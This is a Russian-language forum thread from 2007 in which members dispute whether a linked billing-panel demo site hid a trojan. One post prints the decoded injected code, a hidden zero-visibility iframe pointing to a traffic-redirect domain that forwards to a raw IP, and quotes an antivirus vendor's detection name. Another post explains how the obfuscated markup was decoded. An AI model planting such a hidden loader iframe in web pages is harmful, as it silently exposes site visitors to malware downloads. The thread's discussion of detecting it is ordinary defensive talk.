_Гаврила_ че ты [Вырезано Цензурой] Обьясни наконец!

Discussion in 'Болталка' started by [Y.P.C.]yla, 29 Jan 2007.

  1. [Y.P.C.]yla

    [Y.P.C.]yla Журналист-расследователь

    Joined:
    6 Nov 2006
    Messages:
    166
    Likes Received:
    220
    Reputations:
    123
    Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить??
    Чессно говоря...а то уже запарило это :confused: :mad:
    *****(22:33:43 28/01/2007)
    Тему удалили как я понял и я его не увидел.
    И передай урсуле, что она возможно уже чей-то бот
    Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил.
    *****(22:34:17 28/01/2007)
    Это гаврила написал

    И обьясни от куда ты нарыл
    _______________________________
    ****** (23:07:35 28/01/2007)
    На самом деле в раскодированном виде выглядит это так

    <IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME>

    Потом перекидывает сюда http://81.95.146.241/ss21mk2/index.php
    Ах да
    Вот письмо от дяди Жени

    Здравствуйте.
    1) На сайте обнаружен зловред (Trojan-Downloader.JS.Agent.bx)
    2) На сайте были также недетектируемые нами зловреды - могут возникнуть проблемы.

    Благодарим за оказанную помощь.
    ---------
    С уважением, Юрий Несмачный
    Вирусный аналитик
    ЗАО "Лаборатория Касперского"

    _____________________
    Вопрос: позволь узнать как ты раскодировал?
     
    #1 [Y.P.C.]yla, 29 Jan 2007
    Last edited: 29 Jan 2007
  2. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Вот это и называеца параноя.
     
  3. Undernative

    Undernative DesigneR

    Joined:
    16 May 2006
    Messages:
    325
    Likes Received:
    272
    Reputations:
    14
    Мне отсюда инетересно чем он сделал декод....
     
  4. [Y.P.C.]yla

    [Y.P.C.]yla Журналист-расследователь

    Joined:
    6 Nov 2006
    Messages:
    166
    Likes Received:
    220
    Reputations:
    123
    Sandjuro
    незнаю....незнаю..
    Просто пусть мне предоставит факты!
     
  5. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    У меня такое было очень часто, но я обезаписл себя отовсех и отовсюду, и теперь я свободен от всех.
    просто день идет, а я все жив.
     
  6. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    а через пм или асю никак нельзя у него это узнать ? тему я удалю
     
  7. Undernative

    Undernative DesigneR

    Joined:
    16 May 2006
    Messages:
    325
    Likes Received:
    272
    Reputations:
    14
    Ксан.не трогай тему.Нужен глаС народа
     
  8. [Y.P.C.]yla

    [Y.P.C.]yla Журналист-расследователь

    Joined:
    6 Nov 2006
    Messages:
    166
    Likes Received:
    220
    Reputations:
    123
    Итак обратившись в Лаб Касперского,вот что выдало:
    Trojan-Downloader.JS.Agent.bx

    Детектирование добавлено 11 дек 2006 01:09 MSK
    Обновление выпущено 11 дек 2006 03:08 MSK
    Поведение Trojan-Downloader, троянский загрузчик


    У данной программы пока нет описания.

    Поскольку многие программы являются незначительными модификациями своих предыдущих версий, вам могут помочь описания других версий той же программы — если они есть, то ссылки на них приведены сразу под заголовком страницы.


    Чтож....теперь вопрос....от куда ты взял его?И ту переходную ссылку?

    RemaerD
    Спасибо...
     
  9. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    88
    Reputations:
    17
    Что именно тебя запарило???
    И как попала моя переписка с Ремаёрдом тебе???
    Скорее этот вопрос нужно задать Ремаёрду..
    Я не собираюсь обьяснять чем делать декод, это знает каждый школьник.
    Ну так я и общался с Ремаёрдом через пм.
    Ремаёрд знает что я ему написал в пм для того чтобы он отредактировал свой пост, либо обьяснился.
    Урсула сбавь обороты.
    Подслушивать (подглядывать) чужие разговоры неприлично.
    p.s.
    Не надо писать мне в пм.
    Я не даю уроков кодирования ссылок =)
     
    #9 Гаврила, 29 Jan 2007
    Last edited: 29 Jan 2007
  10. Undernative

    Undernative DesigneR

    Joined:
    16 May 2006
    Messages:
    325
    Likes Received:
    272
    Reputations:
    14
    ГАвря,не вижу ничего такого что нельзя выкладывать из нашего с тобой ПМ... Вобщем я остаюсь на своем мнении...

    УРС ЧмогЕ
     
  11. [Y.P.C.]yla

    [Y.P.C.]yla Журналист-расследователь

    Joined:
    6 Nov 2006
    Messages:
    166
    Likes Received:
    220
    Reputations:
    123
    Солнце,да не волнуйся ты так!
    Блин ну ты понимаешь....я незнаю как декод делается твоими методами :confused: туплю! :(
    Может все таки обьясниш как ты его зделал..в результати чего ты такие космические даные получил?

    Обороты сам сбавляй,когда понадобится так сразу..ты будешь первый кто узнает+))
    А в пм я тебе написала...ну чтоб не заснул+)
     
  12. [Y.P.C.]yla

    [Y.P.C.]yla Журналист-расследователь

    Joined:
    6 Nov 2006
    Messages:
    166
    Likes Received:
    220
    Reputations:
    123
    RemaerD чмоГ:-*
     
  13. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    88
    Reputations:
    17
    Ладно, так и быть, научу тебя =)
    http://ha.ckers.org/xss.html
    Отмотаешь страницу вниз, вставишь код в графу HTML (with semicolons):
    Нажмёш кнопку Decode под этой строкой.
    Вверху увидишь читаемый текст.
    Написал подробно, чтоб ты не спросила опять что-нибудь =) Ну на каую кнопку жать или типа того.
    PHP:
    http://traffloads.com/out.php?s_id=2
    Как видишь, космического нет ничего =)
    А вообще можно просто сохранить код в .html и открыть файл. Но мне казалось что ремаёрд имея такую репу должен знать об этом. Странно что он тебе не обьяснил это.
    Ну вы тут полобыбзайтесь, почмокайтесь, а мне честно говоря не хочется обсуждать более это всё.
    ========
    Ах, ну я понял, репы то у вас типа превед +10.
    Тогда понятно =)
     
    #13 Гаврила, 29 Jan 2007
    Last edited: 29 Jan 2007
  14. [Y.P.C.]yla

    [Y.P.C.]yla Журналист-расследователь

    Joined:
    6 Nov 2006
    Messages:
    166
    Likes Received:
    220
    Reputations:
    123
    Спасибо большое!+)я не понимаю с чего ты решил что это вирус....... ну выдало ссылку.....но не вимжу я ничего подозрительного
    Я ремаёрд-а такими вопросами не гружу,так как успеваю итак достать ими :D
    ========
    нет....+20 :p
     
    #14 [Y.P.C.]yla, 29 Jan 2007
    Last edited: 29 Jan 2007
  15. [Y.P.C.]yla

    [Y.P.C.]yla Журналист-расследователь

    Joined:
    6 Nov 2006
    Messages:
    166
    Likes Received:
    220
    Reputations:
    123
    Короче Гаврила...все эти кода и ссылки да ..замечательно...просто отлично!
    Но все же вопрос остается....а фактов так и нет....хмм...каким же макаром ты определил и подумал что там вирус...которого нет?
    бред какойто!вернее не вирус...а троян..
     
  16. Дрэгги

    Дрэгги Elder - Старейшина

    Joined:
    26 Aug 2005
    Messages:
    284
    Likes Received:
    398
    Reputations:
    182
    Мда...я читал но даже не понял о чем тут речь..жаль у меня не так много времени сидеть на ачате...может тогда бы и смог понять о чем речь в этой теме.
     
  17. Дрэгги

    Дрэгги Elder - Старейшина

    Joined:
    26 Aug 2005
    Messages:
    284
    Likes Received:
    398
    Reputations:
    182
    Насколько я понял урсула прошла по какой-то вредной ссылке и ее комп превратился в бота...а Гаврила эту ссылку раскодировал полностью? Как сложен этот мир...
     
  18. [Y.P.C.]yla

    [Y.P.C.]yla Журналист-расследователь

    Joined:
    6 Nov 2006
    Messages:
    166
    Likes Received:
    220
    Reputations:
    123
    Дрэгги
    Просто я давала ссылку на демо-версию билинг-панели...тогда нужны были програмеры..и для нагладного примера дала ссылку на сайт!Гаврила сказал мол там Трояны...и т.д и т.п.
    Я смотрела ифреймы и основной код....ничего там нету подозрительного!Там был обычный ифрейм с загрузчиком..он утверждает,что там трояны....но их там нету....=\
    я сама ниче не понимаю...из того,что он говорит!
     
  19. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,159
    Likes Received:
    299
    Reputations:
    156
    Фига се. Обычный ифрейм с загрузчиком =))))

    Звучит как - да подумаешь, тебе троян установился. Делов то! =))))
    ...
    p.s. участникам темы читать что такое довнлоадер и нафига его вообще используют (для чего)
     
    _________________________
  20. [Y.P.C.]yla

    [Y.P.C.]yla Журналист-расследователь

    Joined:
    6 Nov 2006
    Messages:
    166
    Likes Received:
    220
    Reputations:
    123
    Да нет...
    мой комп не превратился в бота!это ИМХо
    и зловредной ссылки тоже не было!
    пЫсЫ:я боюсь если выложу кода...то будут возражения...мол вирусы вылаживаю!
    Гаврила как раз утверждает что что ботов эта херь собирала для доссов